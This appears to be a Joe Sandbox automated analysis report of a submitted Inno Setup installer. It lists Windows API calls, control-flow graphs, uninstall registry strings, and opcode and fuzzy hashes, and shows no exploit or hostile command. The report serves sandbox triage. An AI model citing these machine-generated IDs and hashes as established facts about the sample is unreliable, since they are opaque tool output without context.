                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID: unins$unins???.*
                                                            • API String ID: 3541575487-1009660736
                                                            • Opcode ID: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                            • Instruction ID: 9ba6e551af2be01ae54f2bf6d4feb37662207b66b60327addd096aea054bc42d
                                                            • Opcode Fuzzy Hash: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                            • Instruction Fuzzy Hash: 333153706005489FDB10EB65D981ADE77B9EF44344F5080F6A80CAB3B2DBB89F418B58
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileFindFirstLast
                                                            • String ID:
                                                            • API String ID: 873889042-0
                                                            • Opcode ID: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                            • Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
                                                            • Opcode Fuzzy Hash: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                            • Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
                                                            APIs
                                                            • GetVersion.KERNEL32(?,0046E422), ref: 0046E396
                                                            • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E422), ref: 0046E3B2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateInstanceVersion
                                                            • String ID:
                                                            • API String ID: 1462612201-0
                                                            • Opcode ID: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                            • Instruction ID: ca204bcfc643a6eeda20b237376823326e775e7ff9cf44b6f5c5a065e078b710
                                                            • Opcode Fuzzy Hash: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                            • Instruction Fuzzy Hash: 80F0A035282200DEEB1097AADC45B4A37C1BB20718F40007BF440D7391E3FDD8908A5F
                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                            • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                            • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                            • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                            APIs
                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: NtdllProc_Window
                                                            • String ID:
                                                            • API String ID: 4255912815-0
                                                            • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                            • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                            • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                            • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                            • Instruction ID: 445fb77b721d6e8bc33303137c5d79e403f1e24c04085a252f4bbff9531eb306
                                                            • Opcode Fuzzy Hash: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                            • Instruction Fuzzy Hash: 6AD0C271304704A3C700AAA99C825AA35DD8B84315F00483F3CC6DA3C3FABDDA481696
                                                            APIs
                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F54C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: NtdllProc_Window
                                                            • String ID:
                                                            • API String ID: 4255912815-0
                                                            • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                            • Instruction ID: 55aff4e3ab0814f5b97a0c0db1ec4da333d3f7c11773d115dc143ade784a7ab4
                                                            • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                            • Instruction Fuzzy Hash: BAD05E7120010C7B9B00DE9CE840C6B33BC9B88700BA08825F918C7202C634ED5187A8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 406 46f300-46f332 407 46f334-46f33b 406->407 408 46f34f 406->408 409 46f346-46f34d 407->409 410 46f33d-46f344 407->410 411 46f356-46f38e call 403634 call 403738 call 42ded0 408->411 409->411 410->408 410->409 418 46f390-46f3a4 call 403738 call 42ded0 411->418 419 46f3a9-46f3d2 call 403738 call 42ddf4 411->419 418->419 427 46f3d4-46f3dd call 46efd0 419->427 428 46f3e2-46f40b call 46f0ec 419->428 427->428 432 46f41d-46f420 call 403400 428->432 433 46f40d-46f41b call 403494 428->433 437 46f425-46f470 call 46f0ec call 42c40c call 46f134 call 46f0ec 432->437 433->437 446 46f486-46f4a7 call 455588 call 46f0ec 437->446 447 46f472-46f485 call 46f15c 437->447 454 46f4fd-46f504 446->454 455 46f4a9-46f4fc call 46f0ec call 431414 call 46f0ec call 431414 call 46f0ec 446->455 447->446 456 46f506-46f543 call 431414 call 46f0ec call 431414 call 46f0ec 454->456 457 46f544-46f54b 454->457 455->454 456->457 460 46f58c-46f5b1 call 40b44c call 46f0ec 457->460 461 46f54d-46f58b call 46f0ec * 3 457->461 479 46f5b3-46f5be call 47bfd8 460->479 480 46f5c0-46f5c9 call 403494 460->480 461->460 491 46f5ce-46f5d9 call 478d20 479->491 480->491 496 46f5e2 491->496 497 46f5db-46f5e0 491->497 498 46f5e7-46f7b1 call 403778 call 46f0ec call 47bfd8 call 46f134 call 403494 call 40357c * 2 call 46f0ec call 403494 call 40357c * 2 call 46f0ec call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 496->498 497->498 561 46f7c7-46f7d5 call 46f15c 498->561 562 46f7b3-46f7c5 call 46f0ec 498->562 566 46f7da 561->566 567 46f7db-46f824 call 46f15c call 46f190 call 46f0ec call 47bfd8 call 46f1f4 562->567 566->567 578 46f826-46f849 call 46f15c * 2 567->578 579 46f84a-46f857 567->579 578->579 580 46f926-46f92d 579->580 581 46f85d-46f864 579->581 585 46f987-46f99d RegCloseKey 580->585 586 46f92f-46f965 call 4946bc 580->586 583 46f866-46f86d 581->583 584 46f8d1-46f8e0 581->584 583->584 589 46f86f-46f893 call 430bdc 583->589 588 46f8e3-46f8f0 584->588 586->585 592 46f907-46f920 call 430c18 call 46f15c 588->592 593 46f8f2-46f8ff 588->593 589->588 601 46f895-46f896 589->601 604 46f925 592->604 593->592 597 46f901-46f905 593->597 597->580 597->592 603 46f898-46f8be call 40b44c call 47954c 601->603 609 46f8c0-46f8c6 call 430bdc 603->609 610 46f8cb-46f8cd 603->610 604->580 609->610 610->603 612 46f8cf 610->612 612->588
                                                            APIs
                                                              • Part of subcall function 0046F0EC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                              • Part of subcall function 0046F15C: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                            • RegCloseKey.ADVAPI32(?,0046F9A5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F9F0,?,?,0049C1D0,00000000), ref: 0046F998
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Value$Close
                                                            • String ID: " /SILENT$5.5.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                            • API String ID: 3391052094-1769338133
                                                            • Opcode ID: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                            • Instruction ID: 138fe2a8aa43a8f2517aa1aee13eacc10811dc4b0cf032f1bf39601b5d09dcc5
                                                            • Opcode Fuzzy Hash: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                            • Instruction Fuzzy Hash: 96126331A001089BCB04EB55F891ADE77F5FB49304F60807BE841AB396EB79BD49CB59

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1027 492208-49223c call 403684 1030 49223e-49224d call 446fac Sleep 1027->1030 1031 492252-49225f call 403684 1027->1031 1036 4926e2-4926fc call 403420 1030->1036 1037 49228e-49229b call 403684 1031->1037 1038 492261-492289 call 447008 call 403738 FindWindowA call 447288 1031->1038 1046 4922ca-4922d7 call 403684 1037->1046 1047 49229d-4922c0 call 447008 call 403738 FindWindowA call 447288 1037->1047 1038->1036 1054 4922d9-49231b call 446fac * 4 SendMessageA call 447288 1046->1054 1055 492320-49232d call 403684 1046->1055 1067 4922c5 1047->1067 1054->1036 1064 49237c-492389 call 403684 1055->1064 1065 49232f-492377 call 446fac * 4 PostMessageA call 4470e0 1055->1065 1076 4923d8-4923e5 call 403684 1064->1076 1077 49238b-4923d3 call 446fac * 4 SendNotifyMessageA call 4470e0 1064->1077 1065->1036 1067->1036 1089 492412-49241f call 403684 1076->1089 1090 4923e7-49240d call 447008 call 403738 RegisterClipboardFormatA call 447288 1076->1090 1077->1036 1102 492421-49245b call 446fac * 3 SendMessageA call 447288 1089->1102 1103 492460-49246d call 403684 1089->1103 1090->1036 1102->1036 1115 49246f-4924af call 446fac * 3 PostMessageA call 4470e0 1103->1115 1116 4924b4-4924c1 call 403684 1103->1116 1115->1036 1128 492508-492515 call 403684 1116->1128 1129 4924c3-492503 call 446fac * 3 SendNotifyMessageA call 4470e0 1116->1129 1140 49256a-492577 call 403684 1128->1140 1141 492517-492535 call 447008 call 42e3a4 1128->1141 1129->1036 1151 492579-4925a5 call 447008 call 403738 call 446fac GetProcAddress 1140->1151 1152 4925f1-4925fe call 403684 1140->1152 1158 492547-492555 GetLastError call 447288 1141->1158 1159 492537-492545 call 447288 1141->1159 1183 4925e1-4925ec call 4470e0 1151->1183 1184 4925a7-4925dc call 446fac * 2 call 447288 call 4470e0 1151->1184 1164 492600-492621 call 446fac FreeLibrary call 4470e0 1152->1164 1165 492626-492633 call 403684 1152->1165 1170 49255a-492565 call 447288 1158->1170 1159->1170 1164->1036 1180 492658-492665 call 403684 1165->1180 1181 492635-492653 call 447008 call 403738 CreateMutexA 1165->1181 1170->1036 1191 49269b-4926a8 call 403684 1180->1191 1192 492667-492699 call 48c638 call 403574 call 403738 OemToCharBuffA call 48c650 1180->1192 1181->1036 1183->1036 1184->1036 1204 4926aa-4926dc call 48c638 call 403574 call 403738 CharToOemBuffA call 48c650 1191->1204 1205 4926de 1191->1205 1192->1036 1204->1036 1205->1036
                                                            APIs
                                                            • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                            • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FindSleepWindow
                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                            • API String ID: 3078808852-3310373309
                                                            • Opcode ID: 04389725d469abda592edc5d686fc9dc2997d938da4e0f8a72bd6865d44b9f5f
                                                            • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                            • Opcode Fuzzy Hash: 04389725d469abda592edc5d686fc9dc2997d938da4e0f8a72bd6865d44b9f5f
                                                            • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1589 4834fc-483521 GetModuleHandleA GetProcAddress 1590 483588-48358d GetSystemInfo 1589->1590 1591 483523-483539 GetNativeSystemInfo GetProcAddress 1589->1591 1592 483592-48359b 1590->1592 1591->1592 1593 48353b-483546 GetCurrentProcess 1591->1593 1594 4835ab-4835b2 1592->1594 1595 48359d-4835a1 1592->1595 1593->1592 1602 483548-48354c 1593->1602 1598 4835cd-4835d2 1594->1598 1596 4835a3-4835a7 1595->1596 1597 4835b4-4835bb 1595->1597 1600 4835a9-4835c6 1596->1600 1601 4835bd-4835c4 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1604 48354e-483555 call 452708 1602->1604 1604->1592 1607 483557-483564 GetProcAddress 1604->1607 1607->1592 1608 483566-48357d GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 48357f-483586 1608->1609 1609->1592
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                            • API String ID: 2230631259-2623177817
                                                            • Opcode ID: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                            • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                            • Opcode Fuzzy Hash: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                            • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1615 4690f4-46912c call 47bfd8 1618 469132-469142 call 478d40 1615->1618 1619 46930e-469328 call 403420 1615->1619 1624 469147-46918c call 4078fc call 403738 call 42de2c 1618->1624 1630 469191-469193 1624->1630 1631 469304-469308 1630->1631 1632 469199-4691ae 1630->1632 1631->1619 1631->1624 1633 4691c3-4691ca 1632->1633 1634 4691b0-4691be call 42dd5c 1632->1634 1635 4691f7-4691fe 1633->1635 1636 4691cc-4691ee call 42dd5c call 42dd74 1633->1636 1634->1633 1639 469257-46925e 1635->1639 1640 469200-469225 call 42dd5c * 2 1635->1640 1636->1635 1655 4691f0 1636->1655 1642 4692a4-4692ab 1639->1642 1643 469260-469272 call 42dd5c 1639->1643 1662 469227-469230 call 431508 1640->1662 1663 469235-469247 call 42dd5c 1640->1663 1648 4692e6-4692fc RegCloseKey 1642->1648 1649 4692ad-4692e1 call 42dd5c * 3 1642->1649 1656 469274-46927d call 431508 1643->1656 1657 469282-469294 call 42dd5c 1643->1657 1649->1648 1655->1635 1656->1657 1657->1642 1670 469296-46929f call 431508 1657->1670 1662->1663 1663->1639 1671 469249-469252 call 431508 1663->1671 1670->1642 1671->1639
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                            Strings
                                                            • Inno Setup: Setup Type, xrefs: 00469206
                                                            • Inno Setup: Deselected Components, xrefs: 00469238
                                                            • Inno Setup: Selected Components, xrefs: 00469216
                                                            • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                            • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                            • Inno Setup: No Icons, xrefs: 004691DF
                                                            • Inno Setup: Selected Tasks, xrefs: 00469263
                                                            • Inno Setup: User Info: Name, xrefs: 004692B3
                                                            • Inno Setup: Icon Group, xrefs: 004691D2
                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                            • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                            • %s\%s_is1, xrefs: 00469171
                                                            • Inno Setup: App Path, xrefs: 004691B6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                            • API String ID: 47109696-1093091907
                                                            • Opcode ID: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                            • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                            • Opcode Fuzzy Hash: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                            • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1944 47cb30-47cb86 call 42c40c call 4035c0 call 47c7a8 call 4525c4 1953 47cb92-47cba1 call 4525c4 1944->1953 1954 47cb88-47cb8d call 453330 1944->1954 1958 47cba3-47cba9 1953->1958 1959 47cbbb-47cbc1 1953->1959 1954->1953 1960 47cbcb-47cbd3 call 403494 1958->1960 1961 47cbab-47cbb1 1958->1961 1962 47cbc3-47cbc9 1959->1962 1963 47cbd8-47cc00 call 42e3a4 * 2 1959->1963 1960->1963 1961->1959 1965 47cbb3-47cbb9 1961->1965 1962->1960 1962->1963 1970 47cc27-47cc41 GetProcAddress 1963->1970 1971 47cc02-47cc22 call 4078fc call 453330 1963->1971 1965->1959 1965->1960 1973 47cc43-47cc48 call 453330 1970->1973 1974 47cc4d-47cc6a call 403400 * 2 1970->1974 1971->1970 1973->1974
                                                            APIs
                                                            • GetProcAddress.KERNEL32(73F70000,SHGetFolderPathA), ref: 0047CC32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
